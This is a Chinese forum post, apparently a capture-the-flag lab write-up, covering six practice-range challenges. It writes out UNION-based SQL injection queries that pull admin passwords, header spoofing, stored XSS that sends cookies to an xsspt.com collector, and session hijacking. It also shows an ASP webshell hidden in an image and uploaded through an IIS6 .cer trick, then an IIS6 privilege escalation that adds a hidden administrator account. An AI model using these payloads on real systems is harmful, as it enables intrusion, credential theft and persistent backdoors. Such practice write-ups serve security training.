逸辰 一到六总结 - 已锁定

逸辰   ·   发表于 2019-02-14 11:12:10   ·   CTF&WP专版

需要看的话直接下附件吧

一、1.  首先进入靶场


点击查看新闻进入http://117.41.229.122:8003/?id=1,尝试寻找是否存在sql注入点。

2.首先and 1=1 ,返回结果如下:


and 1 = 2,返回结果如下:


这里基本可以判断存在注入点。

3.采用二分法从10开始,order by 10,


直到order by 2,


注入点为2

and 1=2 union select 1,2查出字段数


 

4.确定数据库版本:

and 1=2 union select 1,version(),确定数据库版本为5.5.53




 and 1=2 union select 1,database()


 

查询表名:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()


最后查询密码:

and 1=2 union select 1,password from admin


附资料链接:

http://techotaku.me/2018/07/24/mysql%E5%B8%B8%E8%A7%81%E6%B3%A8%E5%85%A5%E6%B5%81%E7%A8%8B/#%E4%B8%80%E3%80%81Mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E7%BB%93%E6%9E%84%E5%8F%8A%E7%89%B9%E6%80%A7%EF%BC%9A

https://jiayi.space/post/sqlzhu-ru-ji-ch


二、

1、  进入靶场,点开一个新闻,and 1 = 1发现被拦截了


2、  尝试使用cookie

添加一个Cookie头,并写值为id=171,改id=170同样正常,说明可以使用cookie


3、  确定字段数

order+by+10正常,11出错,所以字段数10



4、  注入171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin


回显点2,3,7,8,9,任选两个分别填入最常见的管理表字段名UsernamePassword id=171+union+select+1,2,3,4,5,6,7, username,password,10+from+admin


得到管理员用户名和密码,进入https://cmd5.com/解密得明文:welcome

进入后台http://120.203.13.111:8001/admin/,拿到flag



三、

1、  进入管理员界面http://120.203.13.75:8001/admin123/Login.asp

登录,不允许从外部链接访问。

                                               

2、  抓包


使用ModHeader插件,将Host设置为127.0.0.1:8080,Referer设置为http://127.0.0.1/admin123/default.asp.


登录拿到flag


四、

存储型XSS

https://xsspt.com上创建项目,将如何使用一栏的代码复制进留言板,提交刷新。

进入自己的项目,查看,拿到flagcookie

                                               

五、

进入靶场,F12,选择Application,找到cookie一项,将上次获得的cookie分别改入进去

 

改:

Name Value

ADMINSESSIONIDCSTRCSDQ LBMLMBCCNPFINOANFGLPCFBC

右侧不方便,改成下方

 

刷新页面进入管理后台

 

寻找上传点,在产品管理中找到上传点

 

编写一句话asp木马并上传

 

 

限制上传类型,因为得知系统使用的是iis6.0,查找漏洞

 

不可行。

 

制作图片木马:记事本打开图片,插入一句话木马,保存。

 

成功上传

 

打开菜刀添加,图片地址,以及密码

 

修改脚本类型为ASP

 

双击进入405,未被执行,我们得知,上传cer文件,iis6.0会解且执行

重命名.cer上传。

重新连接进入E盘,拿到flag

 

也可以通过CMD将a.png和b.asp合成为c.png

copy a.png/b+b.asp c.png


 





六、接上次的菜刀虚拟终端whoami没权限                                               

上传自己的cmd.exe

虚拟终端

上传iis6.exe

通过iis6达到获取权限的目的 路径iis6.exe “whoami”

E:5\Menu\iis6.exe "net user minguoyu 123321 /add"添加用户 密码


E:5\Menu\iis6.exe "net localgroup administrators minguoyu /add" 加入管理组


OK,远程登录。


进入C盘,拿到flag


 


打赏我,让我更有动力~

附件列表

公开课靶场1到6.rar   文件大小:4.215M (下载次数:5)

0 条回复   |  直到 2019-2-14 | 1387 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.